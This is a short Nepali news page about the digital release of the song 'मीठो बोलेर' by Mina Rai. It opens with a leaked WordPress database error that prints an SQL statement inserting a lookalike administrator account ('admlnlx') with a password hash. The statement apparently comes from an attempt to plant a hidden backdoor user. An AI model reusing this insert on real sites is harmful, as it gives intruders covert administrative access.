WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx5khiYIUueNFQBfb.Nv.oMe936Id./', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 20:40:24', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । गायिका मिना राईको शब्द/संगित रहेको ‘मीठो बोलेर’ बोलको गीत बिहिबार डिजिटल बजारमा सार्वजनिक गरिएको छ ।
मेगास्टार गायक राजेश पायल राई र अमृता थुलुङ राईको स्वरमा रहेको गीतको स्टुडियो भिडियो मिना राई अफिसियल युटुबमार्फत सार्वजनिक गरिएको हो ।
गायीका मिना राईको शब्द/सगीत र कृष्ण भक्त राईको सगीत सम्योजन रहेको गीतमा छायाँकन र सम्पादन गंगाराम राईले गरेका छन ।